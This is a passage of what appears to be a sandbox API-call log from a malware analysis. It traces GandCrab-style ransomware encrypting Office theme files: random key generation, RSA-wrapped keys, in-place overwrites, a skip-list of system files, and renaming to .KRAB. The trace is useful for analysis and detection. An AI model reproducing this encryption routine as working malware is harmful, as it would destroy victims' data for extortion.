szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb220) returned 1 [0065.104] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0065.105] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.105] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.105] CryptGenRandom (in: hProv=0xfbb220, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0065.105] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0065.105] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.105] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb770) returned 1 [0065.106] CryptImportKey (in: hProv=0xfbb770, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbe020) returned 1 [0065.106] CryptGetKeyParam (in: hKey=0xfbe020, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.106] CryptEncrypt (in: hKey=0xfbe020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.106] GetLastError () returned 0x0 [0065.106] CryptDestroyKey (hKey=0xfbe020) returned 1 [0065.106] CryptReleaseContext (hProv=0xfbb770, dwFlags=0x0) returned 1 [0065.106] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbd48) returned 1 [0065.107] CryptImportKey (in: hProv=0xfbbd48, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0065.107] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.107] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.107] GetLastError () returned 0x0 [0065.107] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0065.107] CryptReleaseContext (hProv=0xfbbd48, dwFlags=0x0) returned 1 [0065.107] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0065.179] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0065.179] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0065.179] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0065.280] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.280] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0065.282] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0065.357] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.357] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0065.359] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xef7a4, lpOverlapped=0x0) returned 1 [0065.373] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff1085c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.373] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xef7a4, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xef7a4, lpOverlapped=0x0) returned 1 [0065.375] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0065.375] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.379] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.383] CloseHandle (hObject=0x488) returned 1 [0065.455] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.455] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx.krab")) returned 1 [0065.456] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.456] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0065.456] lstrcmpW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2=".") returned 1 [0065.457] lstrcmpW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="..") returned 1 [0065.457] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457491[[fn=Metropolitan]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx" [0065.457] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0065.457] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx.KRAB") returned 141 [0065.457] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0065.457] lstrlenW (lpString=".thmx") returned 5 [0065.457] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.457] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0065.457] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0065.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx") returned 136 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="desktop.ini") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="autorun.inf") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="ntuser.dat") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="iconcache.db") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="bootsect.bak") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="boot.ini") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="ntuser.dat.log") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="thumbs.db") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="ntldr") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="NTDETECT.COM") returned 1 [0065.458] lstrcmpiW (lpString1="TM03457491[[fn=Metropolitan]].thmx", lpString2="Bootfont.bin") returned 1 [0065.458] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.459] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbca08) returned 1 [0065.459] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0065.460] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.460] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.460] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0065.460] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0065.460] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.460] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbca08) returned 1 [0065.461] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0065.461] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.461] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.461] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0065.461] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0065.461] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.462] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbca08) returned 1 [0065.462] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbde20) returned 1 [0065.462] CryptGetKeyParam (in: hKey=0xfbde20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.462] CryptEncrypt (in: hKey=0xfbde20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.463] GetLastError () returned 0x0 [0065.463] CryptDestroyKey (hKey=0xfbde20) returned 1 [0065.463] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0065.463] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbca08) returned 1 [0065.463] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbde20) returned 1 [0065.463] CryptGetKeyParam (in: hKey=0xfbde20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.463] CryptEncrypt (in: hKey=0xfbde20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.464] GetLastError () returned 0x0 [0065.464] CryptDestroyKey (hKey=0xfbde20) returned 1 [0065.464] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0065.464] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0065.465] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0065.465] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0065.466] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xbddaf, lpOverlapped=0x0) returned 1 [0065.558] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff42251, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.558] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xbddaf, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xbddaf, lpOverlapped=0x0) returned 1 [0065.559] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0065.559] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.705] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.708] CloseHandle (hObject=0x488) returned 1 [0065.736] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.737] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx.krab")) returned 1 [0065.738] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.738] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0065.738] lstrcmpW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2=".") returned 1 [0065.738] lstrcmpW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="..") returned 1 [0065.738] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457496[[fn=Parallax]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx" [0065.738] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0065.738] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx.KRAB") returned 137 [0065.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0065.738] lstrlenW (lpString=".thmx") returned 5 [0065.738] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.739] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0065.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0065.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx") returned 132 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="desktop.ini") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="autorun.inf") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="ntuser.dat") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="iconcache.db") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="bootsect.bak") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="boot.ini") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="ntuser.dat.log") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="thumbs.db") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0065.739] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0065.740] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="ntldr") returned 1 [0065.740] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="NTDETECT.COM") returned 1 [0065.740] lstrcmpiW (lpString1="TM03457496[[fn=Parallax]].thmx", lpString2="Bootfont.bin") returned 1 [0065.740] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0065.740] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb440) returned 1 [0065.740] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0065.741] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.741] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.741] CryptGenRandom (in: hProv=0xfbb440, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0065.741] CryptReleaseContext (hProv=0xfbb440, dwFlags=0x0) returned 1 [0065.741] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.741] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb198) returned 1 [0065.742] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0065.742] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0065.742] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0065.742] CryptGenRandom (in: hProv=0xfbb198, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0065.742] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0065.742] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.743] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb7f8) returned 1 [0065.743] CryptImportKey (in: hProv=0xfbb7f8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd220) returned 1 [0065.743] CryptGetKeyParam (in: hKey=0xfbd220, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.743] CryptEncrypt (in: hKey=0xfbd220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.744] GetLastError () returned 0x0 [0065.744] CryptDestroyKey (hKey=0xfbd220) returned 1 [0065.744] CryptReleaseContext (hProv=0xfbb7f8, dwFlags=0x0) returned 1 [0065.744] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbbb0) returned 1 [0065.744] CryptImportKey (in: hProv=0xfbbbb0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd860) returned 1 [0065.744] CryptGetKeyParam (in: hKey=0xfbd860, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0065.744] CryptEncrypt (in: hKey=0xfbd860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0065.745] GetLastError () returned 0x0 [0065.745] CryptDestroyKey (hKey=0xfbd860) returned 1 [0065.745] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0065.745] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0065.745] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0065.746] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0065.746] ReadFile (in: hFile=0x488, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0xe1c0f, lpOverlapped=0x0) returned 1 [0065.821] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfff1e3f1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.821] WriteFile (in: hFile=0x488, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0xe1c0f, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0xe1c0f, lpOverlapped=0x0) returned 1 [0065.822] WriteFile (in: hFile=0x488, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0065.823] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.826] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.830] CloseHandle (hObject=0x488) returned 1 [0065.984] 